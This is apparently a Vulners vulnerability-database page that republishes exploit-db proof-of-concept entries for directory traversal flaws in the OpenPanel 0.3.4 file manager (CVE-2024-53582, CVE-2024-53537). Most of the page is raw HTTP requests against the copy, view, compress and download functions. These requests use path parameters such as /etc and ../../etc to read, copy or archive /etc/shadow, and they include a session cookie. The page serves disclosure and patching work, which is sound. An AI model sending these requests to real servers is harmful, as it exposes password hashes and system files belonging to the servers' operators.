Vulners
Lucene search
OpenPanel 0.3.4 Directory Traversal Vulnerability
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | CVE-2024-53537 | 31 Jan 202516:16 | – | circl |
| CVE-2024-53582 | 31 Jan 202516:16 | – | circl |
 | OpenPanel 安全漏洞 | 31 Jan 202500:00 | – | cnnvd |
| OpenPanel 安全漏洞 | 31 Jan 202500:00 | – | cnnvd |
 | CVE-2024-53537 | 31 Jan 202500:00 | – | cve |
| CVE-2024-53582 | 31 Jan 202500:00 | – | cve |
 | CVE-2024-53537 | 31 Jan 202500:00 | – | cvelist |
| CVE-2024-53582 | 31 Jan 202500:00 | – | cvelist |
 | OpenPanel 0.3.4 - Directory Traversal | 14 Apr 202500:00 | – | exploitdb |
| OpenPanel 0.3.4 - Incorrect Access Control | 14 Apr 202500:00 | – | exploitdb |
10
# Exploit Title: OpenPanel 0.3.4 - Directory Traversal in Copy Function of File Manager
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Content-Length: 0
Te: trailers
-------
# Exploit Title: OpenPanel 0.3.4 - Directory Traversal in View Function of File Manager
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
-------
# Exploit Title: OpenPanel v0.3.4 to v0.2.1 - Directory Traversal in File Actions of File Manager
# Date: Dec 05, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53537
### Compress Function ###
POST /compress_files HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar
### Copy Function ###
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Content-Length: 0
Te: trailers
### Download Function ###
GET /download_file/shadow?path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
### View Function ###
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jan 2025 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.19.1
EPSS0.03067
SSVC